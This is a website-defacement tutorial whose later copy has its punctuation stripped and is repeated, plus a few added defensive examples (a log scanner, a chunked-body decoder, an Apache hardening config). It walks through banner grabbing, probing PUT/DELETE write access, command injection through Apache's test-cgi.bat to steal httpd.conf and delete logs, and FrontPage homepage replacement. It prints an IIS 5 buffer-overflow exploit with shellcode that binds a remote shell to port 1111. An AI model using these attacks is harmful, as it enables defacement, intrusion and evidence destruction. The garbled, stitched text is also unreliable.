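    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})')
SHELL_META = re.compile(r'[|&;`]')
CGI_BATCH = re.compile(r'/cgi-bin/[^?]*\.(bat|cmd)(\?|$)', re.IGNORECASE)
CONFIG_FETCH = re.compile(r'/(httpd\.conf|\.htaccess|web\.config)$', re.IGNORECASE)
WRITE_METHODS = ("PUT", "DELETE", "MOVE", "COPY")


def parse_line(line):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def findings(entry):
    """Reasons a single access-log entry deserves attention."""
    uri = unquote(entry["uri"])          # %7C and friends hide the pipe
    path, _, query = uri.partition("?")
    reasons = []
    if CGI_BATCH.search(uri) and SHELL_META.search(query):
        reasons.append("shell metacharacter passed to a batch CGI (command injection)")
    if CONFIG_FETCH.search(path) and entry["status"] == "200":
        reasons.append("server configuration file served from the web root")
    if entry["method"] in WRITE_METHODS and entry["status"].startswith("2"):
        reasons.append(f"{entry['method']} succeeded: content written or removed over HTTP")
    return reasons


def scan(log_text):
    """[(client ip, raw uri, reasons)] for every suspicious line, in log order."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry:
            reasons = findings(entry)
            if reasons:
                hits.append((entry["ip"], entry["uri"], reasons))
    return hits


if __name__ == "__main__":
    for ip, uri, reasons in scan(SAMPLE_LOG):
        print(ip, uri, "; ".join(reasons))
```

Run this over the live log on the web server and the attacker's DEL request is the last thing recorded before the file disappears; run it on a copy shipped off the host and the deletion changes nothing.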

In the case of IIS on Windows 2000 you can use the following method to get a DOS shell through telnet.

The CHINANSL program listed above under "Overworking known vulnerabilities to break into a server" exploits a buffer overflow in IIS 5 on Windows 2000 Server, opens port 1111 on the target and binds a shell to it. If the exploit succeeds, all you have to do is telnet to port 1111 of the target and the system is yours.


IMPLEMENTATION OF THE CODE

To use the C code you must compile it and run it. Now you must be wondering what the use of this code is. The program triggers an overflow in IIS on Windows 2000 and makes the system bind a command shell to port 1111 on the target (a bind shell, listening on the target itself, not on your machine). So once the exploit works there is a shell bound to port 1111 on the target system. To use it, telnet to port 1111 of the target IP; through this you are connected to the system without any kind of authentication.
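The exploit above delivers its payload as a chunked POST (Transfer-Encoding: chunked, with chunk sizes 10, 4, 4 and the terminating 0). The following added example, which is not part of the original tutorial or of the CHINANSL code, rebuilds that chunk layout from the values in the listing and pairs it with a chunked-body decoder that refuses a declared chunk size it cannot hold before copying anything: that is the check a server-side parser has to make, and the one whose absence a chunked-encoding overflow abuses. The decoder, its 64 KiB default limit and the ChunkError type are this example's own assumptions.

```python
# Added example, not from the original tutorial or the CHINANSL exploit:
# the chunk layout the exploit sends, plus a bounded chunked-body decoder.


class ChunkError(ValueError):
    """Raised for a malformed or over-limit chunked body."""


def build_chunked(chunks):
    """Encode a list of byte strings as an HTTP/1.1 chunked body."""
    out = bytearray()
    for chunk in chunks:
        out += f"{len(chunk):x}\r\n".encode() + chunk + b"\r\n"
    out += b"0\r\n\r\n"
    return bytes(out)


def decode_chunked(body, max_total=64 * 1024):
    """Decode a chunked body, refusing declared sizes the caller cannot hold."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ChunkError("truncated chunk-size line")
        size_field = body[pos:eol].split(b";", 1)[0].strip()   # drop extensions
        try:
            size = int(size_field, 16)
        except ValueError:
            raise ChunkError(f"bad chunk size {size_field!r}")
        pos = eol + 2
        if size == 0:
            return bytes(out)
        # Check the *declared* size against the limit before any copy: the
        # client controls this field, and a lie here is the overflow.
        if len(out) + size > max_total:
            raise ChunkError(f"declared size {size} exceeds limit {max_total}")
        data = body[pos:pos + size]
        if len(data) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ChunkError("chunk data shorter than declared size")
        out += data
        pos += size + 2


def exploit_layout(pad=b"\xcc\xcc\xcc\xcc" b"ADPA" b"\x02\x02\x02\x02" b"PADP",
                   srcdata=0x01e2fb1c - 4, jmpaddr=0x00457494):
    """The chunk sequence the listing above sends after its headers: the
    16-byte pad, then srcdata and jmpaddr as little-endian DWORDs (the
    "AAAA"/"BBBB" placeholders it patches), then the terminator."""
    return build_chunked([pad,
                          srcdata.to_bytes(4, "little"),
                          jmpaddr.to_bytes(4, "little")])


if __name__ == "__main__":
    body = exploit_layout()
    print(body)
    print(decode_chunked(body))
```

Decoding the exploit's own body succeeds, because its chunks are small and honest; the bound is there for the request that declares a size larger than the buffer the server copies into.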

Various Security Measures

Website defacement has become a serious problem for IT companies; thousands of sites are defaced every day, and government sites are frequent targets, most often as a move in a "cyber war" between rival countries, the wired-world counterpart of a real one.

An archive of defaced pages (a web attack archive) is kept at http://defaced.alldas.org

Some security measures for system administrators:

- First, organize the web root into purpose-specific directories (images in an image directory, server-side content in its own, and so on) and give each the minimum permission its content needs: read-only for static files, script execution only in the directory that holds scripts, and no write access on anything anonymous clients can reach. In IIS that means the Read, Write and Execute Permissions settings of each virtual directory; never grant Write together with Scripts or Executables on the same directory. A web root with everything in one place under one broad permission set is open to the PUT/DELETE and script-execution attacks covered earlier in this tutorial.

- Stay aware of the latest vulnerabilities; visit these sites:

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

- Every web server has had vulnerabilities, but that is no reason for panic: download and apply the vendor's patch for each published vulnerability as soon as it appears.

- Finally, learn to anticipate the attacker. You need to know how a cracker breaks into a site or web server and what motivates the attack; think, act and work like a hacker, and deny the cracker the root access they are after.
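For the first measure, an added example (not from the tutorial) of what "organize the web root" means in Apache terms: an httpd.conf fragment that gives each directory only the permission its content needs and refuses the methods the earlier sections used to write to or enumerate a virtual directory. The paths are assumptions; the access-control syntax is Apache 1.3/2.2 (Apache 2.4 spells the same rules with Require).

```apache
# Added example, not from the tutorial. Paths and server layout are assumptions.
ServerTokens Prod                        # banner says "Apache" with no version

DocumentRoot "/var/www/htdocs"

#  Default for everything under the web root: no directory listings, nothing
# executes, .htaccess cannot loosen it, and only GET/HEAD/POST are answered,
# so PUT, DELETE, PROPFIND, MOVE and COPY get 403 whatever the file modes are.
<Directory "/var/www/htdocs">
    Options -Indexes -ExecCGI -Includes -FollowSymLinks
    AllowOverride None
    <LimitExcept GET HEAD POST>
        Order deny,allow
        Deny from all
    </LimitExcept>
</Directory>

# Static content: served as plain files whatever the extension, so a file
# that somehow lands here is never interpreted as a script.
<Directory "/var/www/htdocs/images">
    Options None
    SetHandler default-handler
</Directory>

# Server-side scripts: the one place execution is granted, kept outside the
# document root so the sources cannot be fetched, with the sample scripts the
# distribution ships (test-cgi and friends) deleted or denied.
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
<Directory "/var/www/cgi-bin">
    Options ExecCGI
    AllowOverride None
    <FilesMatch "^(test-cgi|printenv)">
        Order deny,allow
        Deny from all
    </FilesMatch>
</Directory>

# conf/ and logs/ stay outside DocumentRoot, and nothing under the web root
# is writable by the account httpd runs as.
```

The LimitExcept block is the direct answer to the PUT and DELETE probes shown earlier: the request is refused by the server before filesystem permissions are consulted, so a misconfigured directory mode does not become a defacement. Keeping scripts in a single directory that is the only one with ExecCGI is the Apache form of the "never Write plus Execute on the same directory" rule for IIS.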

This completes my tutorial on defacing websites; I hope you have understood the intricacies of web servers.

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 2: Defacing Website

wwwsecurityfocuscom

wwwpacketstormsecuritycom

These sites even offer the exploit code and the method of

exploitation

You can also discover new vulnerabilities in web servers and sites

through web security scanner

Tools of Trade

Nikto Security Scanner

Stealth HTTP Security Scanner

Acutenix Web Security Scanner

So before defacing websites you must know which sever

software is running by the target website After finding the server

software you will look for vulnerabilities and exploits for the

particular server software So finding the server software is very

essential

Web server detection is very easy and a very obvious method

Basically what happens is that when a request is sent to a web

server it is forced to generate a 400 Bad Request message or a

200 OK message or even 404 Forbidden error message in raw

mode that is through telnet Actually the web server responds

with the corresponding message which contains its web server

software as well as the server software version information

So what we need to do is just telnet the web server or website

into port 80 of a web server and send some request so that the

server responds with a 400 bad request error message or a 200

OK message which will contain the server software and server

software version information

NOTE Port 80 is the default HTTP port for web servers

Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80

GET HTTP11rnrn

Hostserver-software

ltentergt

ltentergt

ltentergt

HTTP11 403 Forbidden

Date Fri 17 Mar 2006 130020 GMT

Server Apache1322 (Win32)

Connection close

Content-Type texthtml charset=iso-8859-1

ltDOCTYPE HTML PUBLIC -IETFDTD HTML 20ENgt

ltHTMLgtltHEADgt

ltTITLEgt403 Forbidd

enltTITLEgt

ltHEADgtltBODYgt

ltH1gtForbiddenltH1gt

You dont have permission to access

on

this serverltPgt

ltHRgt

ltADDRESSgtApache1322 Server at wwwapacheorg

Port 80ltADD

RESSgt

ltBODYgtltHTMLgt

Connection to host lost

I have telnetted wwwhackingtheworldilitehostcom into port 80

so I get the above figure in my command prompt

Okay I hope you have figured out what I mean It is mere telnet

response Okay I will tell you what to do you have to telnet a web

server or website into port 80

NOTE I have telnetted the domain name you can telnet the IP

address also

So after telnetting the web server name or the website you will

get a blank screen So in the blank screen type in some requests

like GET HTTP11rnrn then type something like

Hostserver-software then press ltentergt quite a few times until

you get the serverrsquos response The server will respond with its

software information

Examining the Web Server

If you are using Microsoft IIS (Internet Information service) then

you must have noticed that the default installation contains the

website root in CInetpubwwwroot Basically all the directories

of server softwares are called as virtual directories Actually in a

web server each virtual directory is provided with different type

of permissions Permissions like Read Write Execution of Scripts

and Execution of Executable like Dll and server side pages like

ASP CGI etc

Now I am going to describe the methods of analyzing the

directory permission of a virtual directory residing in a web server

READ ACCESS

Whenever you visit a website through your web browser you type

in the domain name Do you know what happens when you type in

the domain name Actually when you type in the domain name

and press enter you are connected to port 80 (HTTP port) of the

IP address linked with the domain name

For Example

You type in wwwhackingtheworldilitehostcom in your web

browserrsquos address bar The IP (Internet Protocol) address of this

site is 7229654 so as soon as you press enter the URL

(Uniform Resource Locator) is redirects the IP address to

7229654indexhtml indexphp indexasp indexjsp or

whatever the index page is configured in the web server Now

once you press enter you will be redirected to Hacking the

Worldrsquos official website In the website you will be able to read

contents from its wwwroot If the wwwroot directory contains

ASP PHP or JSP then those server side pages are executed and

HTML is generated and passed to the browser (client) by IIS

(server) or any web server dynamically When you are able to read

a document from a given directory then it signals that the

directory is readable Normally it has been seen that directories

containing databases files are forbidden with read access for

security reasons

WRITE ACCESS

I will explain HTTP protocol concisely before going to Write

Access Well HTTP is a component of TCPIP stack It was

configured and formulated with the connotation of sharing files

across the Internet HTTP is the acronym of Hyper Text Transfer

Protocol The name itself indicates the description Files can be

uploaded to the server and downloaded from the server through

the HTTP protocol

NOTE Files can be uploaded to the server and downloaded from

the server through the HTTP protocol without the need of any type

of authentication

Well this was technique was employed and executed years ago

Soon computer enthusiaists realized that this kind of technique

was a huge security threat So they developed new techniques to

subdue the security threat Nowadays web servers are designed

and configured as such to give write access to only selected virtual

directories

TIP Try telnetting a web server and find out some good

information about the server and its behavior

Now I am going to explain some commonly used commands

supported by a web server

GET It is used to send requests for read access to a file residing

on the server by the browser (client)

Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

GET indexhtml HTTP11rnrn

Sidetrack The HTML (Hyper text markup language) source code of

indexhtml page occupying on the server will be regressed or if

requested for ASP or PHP or any server side executable page then

the dynamically generated HTML page will be shown

DEL This is a command for deleting files on the web server This

command requires write access on the assigned virtual directory

where the file is to be deleted

Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

del indexhtml HTTP11rnrn

Sidetrack Most probably you will get a 403 Forbidden Error as it

is quiet obvious that the wwwroot directory will never have a

write access

PUT It is used to create files on the server it necessitates write

access on the particular virtual directory where the file is to be

created

Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

PUT cctxt HTTP11rnrn

Sidetrack Most probably you will get a 403 Forbidden Error as it

is quiet obvious that the wwwroot directory will never have a

write access

ECHO The publishing tool it is the same command used in DOS

(Disk Operating System) Batch Files The output can be redirected

Microsoft Telnetgt wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

ECHO Site defaced by SB gtgt indexhtml HTTP11rnrn

TIP SB is the acronym of my name Shubham Bhattacharya

When you are defacing a site you can also use acronyms of your

name

PROPFIND Propfind is used as a request for directory surfing

NOTE In IIS server it is used as an administrative tool for web

server analysis

Microsoft Telnetgt wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

PROPFIND HTTP11

Hostiis-server

Content-Length0

Sidetrack You will definitely get a 403 Forbidden Error as it is

quiet evident that the wwwroot will never have a write access

Well you must be wondering how you can test write access

permission for a particular directory in IIS server

To test the write access permission for a particular directory in IIS

server follow the steps given below

- To test if write access permission is enabled for anonymous web

clients then telnet the web server or the website in port 80 and

make the following request

PUT scriptshtwasp HTTP11

Host iis-server

Content-Length 10 ltentergtltentergt

Once you make the following request the server should respond

with a 100 Continue Message

HTTP11 100 Continue

Server Microsoft-IIS50

Date Sun 17 Feb 2006 105300 GMT

On receiving the above type 10 letters

XXXXXXXXXX

HTTP11 201 Created

Server Microsoft-IIS50

Date Sun 17 Feb 2006 105608 GMT

Location httpiis-serverdirmy_filetxt

Content-Length 0

Allow OPTIONS TRACE GET HEAD DELETE PUT COPY

MOVE PROPFIND PROPPATCH SEARCH LOCK UNLOCK

If the server responds with this 201 Created response then the

write permission is enabled

EXECUTION ACCESS

Server side pages like ASP PHP JSP or DLL are used in highly

advanced database driven dynamic websites which dynamically

generates the HTML and sends it to the client (web browser)

These server side pages and other executables including DLL and

EXE files needs execution perquisites in the virtual directory

where they are kept

NOTE DLL EXE etc need execution perquisites they are kept in a

single virtual directory

DIRECTORY SURFING

It has been often seen that web servers to be more specific

virtual directories of web servers are configured as such to

provide directory surfing access to all clients or special clients

through proper authentications Actually directory browsing

means that you can list the file and folders present in your virtual

directory just as you see in your standalone system Well most of

the web server administrators turn off this feature But exploit

codes can be used to get directory listing of the virtual directory

EXPLOIT FOR DIRECTORY LISTING IN APACHE

Well if you are not familiar with apache then let me give you a

brief description Apache is a server in which you have to

configure your web server using command and scripts These

scripts and commands are kept in httpdconf file in capache

groupapacheconf folder default Apache installation on a

distinctive windows system This file contains all the settings of

the web server and if we get our hands into this file then we get

to know all the settings of the web server including the location of

log files directory permissions write access authentication levels

etc

So now letrsquos get on with the exploit As we know that Apache is

the most preferred web server This web server has a bat in its

cgi-bin directory This bat file is named as test-cgibat Actually

the motive of the bat file is to test the privileges of cgi-bin

directory

NOTE cgi-bin directory contains all the CGI and Perl scripts

Well it is quiet obvious that cgi-bin virtual directory has execution

permissions These conditions are exploited to perform out

pernicious attacks The bat file in Apache web server is called as

execution of DOS (Disk Operating Systems) The DOS shell is

spawned to it for execution Now we can use | (pipe) character

along with the batch file to execute commands on the remote

server

NOTE If you donrsquot know how to put the | (pipe) character then

donrsquot worry To put the pipe character press Alt+ the

character is just beside your backspace key

So the attack URL will be like this

httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd

conf+htdocshttpdconf

Through the above URL I have copied the httpdconf file from the

conf directory The conf directory mostly does not have read

access to the Apache web root that is htdocs virtual folder Now

we can easily download the httpdconf file using the following

URL

httptargetcomhttpdconf

Since it occupies in the Apache web root Through this method

you will get the httpdconf file and through the httpdconf file you

can get some worthful information about the web server

Inspecting known vulnerabilities

Generally websites are defaced and hacked using vulnerabilities

related with the server software or the Operating System running

the server software Well most of the lsquohackersrsquo deface websites

using vulnerabilities Please note I am talking about hackers not

script kiddies who deface websites using uncanny softwares So

you must know what vulnerability is well if you donrsquot know then

let me tell you all Vulnerability is an existing flaw or defect in the

software architecture which allows a hacker or cracker to take

control over the system or issue capricious system commands to

the server In every software or application or tool vulnerabilities

persist

httpwwwsecurityfocuscom

httpwwwpacketstormorg

httpwwwguininskicom

httpwwwinsecureorg

httpwwwsecuriteamcom

httpwwwslashdotorg

httpwwwtechnotroniccom

The above sites contain latest vulnerabilities with exploit codes

Even if you are an elite or a professional you will find the

information useful

Working with Exploits

Well I must say this is the most exciting part of this tutorial

Okay so wwwvictimcom is the target site Well through the

above methods I mean the methods I have explained earlier in

the tutorial through those methods we have found out that the

website is functioning in Microsoft IIS server software So it is

time to find some vulnerability I am using Acutenix Web Security

Scanner to scan for vulnerabilities You guys must know

programming languages like Perl or Socket Programming or C this

is essential because through this you will be able to compile the

exploits So once you get vulnerability try exploiting it by

executing it in your client (browser)

MICROSOFT FRONPAGE EXTENSION EXPLOIT

This is one of the methods for website defacement using Microsoft

Web Publishing Wizard Using this method one can deface

Websites having FrontPage Server extensions By using Microsoft

Web Publishing Wizard one can replace FrontPage Server

extension pages

Follow the steps given below to execute the following exploit

Telnet the Target website or web server in port 80

CTelnet wwwvictimcom 80

You will get a blank screen type GET and continue pressing

enter till the web server responds to your requests

GET ltENTERgtltENTERgt

NOTE Web servers functioning in IIS server have FrontPage

Extensions enabled by default

So After pressing enter you will get the following

HTTP11 400 Bad Request

Server Microsoft-IIS50

Date Thu 17 Feb 2006 041845 GMT

Content-Type texthtml

Content-Length 87

Once you get the HTTP Bad Request you have search for the

homepage Most of the sites have the default homepage as

httpwwwvictimservercommainasp

httpwwwvictimservercomindexhtml

httpwwwvictimservercomindexhtm

httpwwwvictimservercomindexasp

httpwwwvictimservercommainhtm

httpwwwvictimservercommainhtm

httpwwwvictimservercomdefaulthtm

httpwwwvictimservercomdefaultasp

httpwwwvictimservercomdefaulthtml

Keep assaying all possible FrontPage Extensions unless the page

loads If the extension doesnrsquot exist then it will give a 404 Error

Let us say you have got the homepage as

wwwvictimcomindexhtml so design the page which you want

upload or modify the homepage Here the homepage is indexhtml

once you design the page or modify the page save it as

indexhtml

Now open Web Publishing Wizard and follow the steps given

below

- Open Microsoft Web Publishing Wizard

- Now browse the file that you are going to upload Here

indexhtml is the file which we are going to upload

- Now you get a screen where you have to name the web server

Type in anything and click on Advanced

- Select the service provider from the drop down box This is

nothing but the kind of uploading it is going to do Since your

motive is to deface the site select the FrontPage Extended Web

option since this method of defacing works only for FrontPage

enabled sites

- Type the URL of the victim server homepage and in the given

box here it is wwwvictimcomindexhtml

- Here specify the URL that you type in the Web browser to access

the victim server website

- Select the connection method that you use to access the internet

- Click Finish Voila you have successfully replaced the victimrsquos

homepage with yours

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some

coding exploits I am going to present some exploit codes written

in the most powerful programming language C

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

use MS VC++ to compile this piece of code

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10

x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff

x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33

xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55

xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50

xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0

xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47

x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c

xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff

xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff

x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

The above code is called as an exploit code these are written in

powerful programming languages like C Perl or sometimes JAVA

Exploit Codes are written according to the vulnerability

Vulnerabilities were discovered in the past nowadays it has been

seen that server softwares and operating systems are patched for

these vulnerabilities So you canrsquot just execute exploit code to

break into a server you must overwork an exploit code so that it

works according to your needs One more thing I must mention is

that you must keep yourself updated with latest vulnerabilities by

visiting the sites that I have mentioned earlier in the tutorial

Well I think its better that you code your own exploit code in Perl

or C in order to break into websites

NOTE I am talking about high profile websites I am not talking

about lame websites coded in notepad

Keeping yourself safe

Well you must be familiar with server softwares like Apache

Microsoft IIS etc So you must be knowing about the log files

which records each and every request made by the server As it

records everything system administrators will have no problem

catching the malicious cracker or script kiddie as the log file will

have the IP (Internet Protocol) address and through the IP

address you can trace the cracker or the script kiddie

NOTE Read my tutorial on Gathering Information of Remote Host

TIP If you do not want to get busted you must clear the log files

after you break into a web server

CLEARING LOGS

You must clear yoursquore the logs in order to save yourself from

getting busted So you can use cross site scripting vulnerability

to clear the log files You can do by executing the following URL

httpwwwtargetcomcgi-bintest-cgibat|DEL+log

NOTE The above URL can be used in Apache server software

In case of IIS on Windows 2000 you can use the following method

to get a DOS Shell through telnet

The Following code exploits a buffer overflow in IIS 5 on Windows

2000 server and opens port 1111 and binds a shell to it If the

exploit is successful then all you have to do is use telnet to

connect to port 1111 of target and the system is yours

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10

x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff

x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33

xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55

xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50

xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0

xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47

x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c

xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff

xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff

